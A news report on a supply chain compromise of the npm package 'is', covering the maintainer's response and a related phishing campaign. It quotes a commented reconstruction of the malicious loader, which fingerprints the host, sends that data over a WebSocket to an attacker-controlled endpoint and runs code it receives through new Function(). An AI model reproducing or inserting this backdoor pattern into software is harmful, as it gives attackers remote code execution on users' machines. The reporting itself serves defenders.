Popular JavaScript package is: Malware through supply chain attack

A software supply chain attack has hit the popular JavaScript package is, which has almost 2.7 million downloads per week.

Maintainer Jordan Harband writes on Bluesky that attackers had taken over the account of another project manager. Versions 3.3.1 and 5.0.0 of the package are affected.

Both versions were apparently only in circulation for a few hours. Version 3.3.2 is now available on the npm site, which does not contain any malicious code. As a transition, Harband had declared the newer releases deprecated and marked 3.3.0 as the last active version so that processes that automatically request the latest version of a JavaScript package from npm do not continue to download the malicious code.

code]is[/code] is a testing library that checks, among other things, whether a value is defined (is.defined), empty (is.empty) or of a specific type (generally via is.type(value, type) or specifically as is.integer, is.bool, is.array etc.).

heise conference for web developers

Nine out of ten web applications have security vulnerabilities – High time for web developers to act. The first enterJS Web Security Day on October 9, 2025 will focus on automated security checks, the use of passkeys and protection against AI-based attacks.

Cross-platform malware loader on board

Apparently, the same attacker group that previously hit numerous npm maintainers with a phishing attack and already exploited the packages eslint-config-prettier, eslint-plugin-prettier, synckit@0.11.9, @pkgr/core, napi-postinstall and got-fetch with malicious code.

The attack on the other packages targeted Windows only with a DLL. A blog article on Invoke RE describes the scavenger malware found in the eslint-config-prettier package in more detail.

The malware loader in the is package, on the other hand, strikes cross-platform on Windows, macOS, and Linux.

Hidden malicious code with remote shell

A blog post by the security software company Socket describes how the obfuscated JavaScript code works. The loader creates the payload completely in the memory of the affected system and creates the decoded malicious code as a separate function using new Function().

This function then queries numerous details, such as the host name, operating system, CPU details, and environment variables from process.env. Finally, it uses the ws library to establish a WebSocket connection and transfer the data.

Socket's security team has added comments describing the functions of the unveiled malicious code:

// Expose Node's `require`, even in restricted contexts (e.g., Electron)
get "switch"() { return require; }

// Load system and networking modules dynamically
const os = this["switch"]("os");
const WS = this["switch"]("ws");

// Connect to threat actor-controlled WebSocket endpoint
const sock = new WS("wss://<decoded-at-runtime-endpoint>");

// Send host fingerprinting data on connect
sock.onopen = () => sock.send(JSON.stringify({
  host: os.hostname(),
  plat: os.platform(),
  cwd : process.cwd()
}));

// Execute threat actor-supplied code received over the socket
sock.onmessage = ({ data }) => {
  new Function(data)();  // remote code execution
};

In the last section, it can be seen that the malicious code establishes a remote shell with the WebSocket connection. It executes the received JavaScript code directly via new Function(). The called code has the same rights as the host process, so it usually has direct access to the file system and network traffic.

Anyone integrating the library should ensure that none of the infected variants have reached the computer. It can also be assumed that the attacker group had or has other JavaScript maintainers in its sights.

(rme)